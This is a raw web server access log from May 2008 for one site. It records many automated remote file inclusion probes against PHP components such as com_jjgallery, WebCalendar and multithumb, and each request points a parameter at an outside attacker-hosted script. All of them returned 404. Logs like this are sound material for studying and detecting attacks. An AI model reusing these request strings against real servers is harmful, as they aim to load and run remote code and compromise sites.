67.19.105.42 - - [18/May/2008:18:57:09 -0700] "GET /logs/access_080414.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
80.67.24.2 - - [18/May/2008:18:57:23 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:57:48 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:57:48 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:57:49 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:18:58:38 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:18:58:38 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:18:59:08 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:18:59:08 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:29 -0700] "GET /logs/access_080211.log//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:29 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:30 -0700] "GET /logs//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:30 -0700] "GET /logs/access.log//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:31 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:31 -0700] "GET /logs//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:36 -0700] "GET /logs/access_080211.log//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:36 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:37 -0700] "GET /logs//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:37 -0700] "GET /logs/access.log//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:37 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:18:59:38 -0700] "GET /logs//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.67.24.2 - - [18/May/2008:18:59:51 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "neighborhoodglimpses.com"
80.67.24.2 - - [18/May/2008:18:59:51 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "neighborhoodglimpses.com"
89.31.204.9 - - [18/May/2008:19:00:17 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "neighborhoodglimpses.com"
89.31.204.9 - - [18/May/2008:19:00:17 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:00:18 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:00:18 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:19:00:52 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:19:00:52 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:19:00:52 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:19:01:43 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:19:01:45 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
89.31.204.9 - - [18/May/2008:19:01:51 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:01:52 -0700] "GET /logs/access_080211.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:01:52 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:01:52 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
89.31.204.9 - - [18/May/2008:19:01:53 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:01:59 -0700] "GET /logs/access_080211.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:01:59 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:02:00 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:19:02:05 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:19:02:07 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:19:02:47 -0700] "GET /logs//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:19:02:47 -0700] "GET /logs//WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:19:02:48 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [18/May/2008:19:02:48 -0700] "GET //WebCalendar//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:02:54 -0700] "GET /logs/access_080211.log/senetman/html/index.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:02:54 -0700] "GET /logs/access_080211.log/senetman/html/index.php?page=http://freewebs.com/alb_rinia/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:02:55 -0700] "GET /senetman/html/index.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:02:55 -0700] "GET /senetman/html/index.php?page=http://freewebs.com/alb_rinia/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:02:55 -0700] "GET /logs/senetman/html/index.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:02:55 -0700] "GET /logs/senetman/html/index.php?page=http://freewebs.com/alb_rinia/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:03:05 -0700] "GET /logs/access_080211.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:03:05 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:03:05 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:03:10 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:03:10 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:19:03:18 -0700] "GET /logs/access_080128.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:19:03:33 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:19:03:33 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:04:11 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:04:11 -0700] "GET /senetman/html/index.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:04:12 -0700] "GET /logs/senetman/html/index.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:04:22 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:04:22 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:19:04:35 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:19:04:35 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:19:04:51 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:19:04:51 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:04:51 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://freewebs.com/alb_rinia/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:19:04:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:04:51 -0700] "GET /senetman/html/index.php?page=http://freewebs.com/alb_rinia/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:04:52 -0700] "GET /logs/senetman/html/index.php?page=http://freewebs.com/alb_rinia/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
204.11.238.133 - - [18/May/2008:19:05:02 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "neighborhoodglimpses.com"
204.11.238.133 - - [18/May/2008:19:05:02 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:05:10 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:05:14 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:19:06:50 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:19:06:50 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:19:06:51 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:07:03 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:07:03 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:19:07:08 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:19:07:08 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:07:08 -0700] "GET /logs/senetman/html/index.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:07:08 -0700] "GET /logs/senetman/html/index.php?page=http://freewebs.com/alb_rinia/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:19:07:08 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:07:08 -0700] "GET /senetman/html/index.php?page=http://freewebs.com/alb_rinia/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.249.116.11 - - [18/May/2008:19:07:08 -0700] "GET /senetman/html/index.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:07:19 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:07:19 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
204.11.238.133 - - [18/May/2008:19:07:30 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
204.11.238.133 - - [18/May/2008:19:07:30 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:08:37 -0700] "GET /pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:08:38 -0700] "GET /logs/pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "neighborhoodglimpses.com"
202.71.102.187 - - [18/May/2008:19:08:39 -0700] "GET /index.php?site=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:08:40 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:08:41 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:09:10 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:09:11 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
202.181.99.12 - - [18/May/2008:19:10:05 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "neighborhoodglimpses.com"
202.181.99.12 - - [18/May/2008:19:10:05 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "neighborhoodglimpses.com"
217.67.26.84 - - [18/May/2008:19:10:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.67.26.84 - - [18/May/2008:19:10:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.67.26.84 - - [18/May/2008:19:10:25 -0700] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.67.26.84 - - [18/May/2008:19:10:26 -0700] "GET //skin/zero_vote/error.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:10:47 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:10:47 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "neighborhoodglimpses.com"
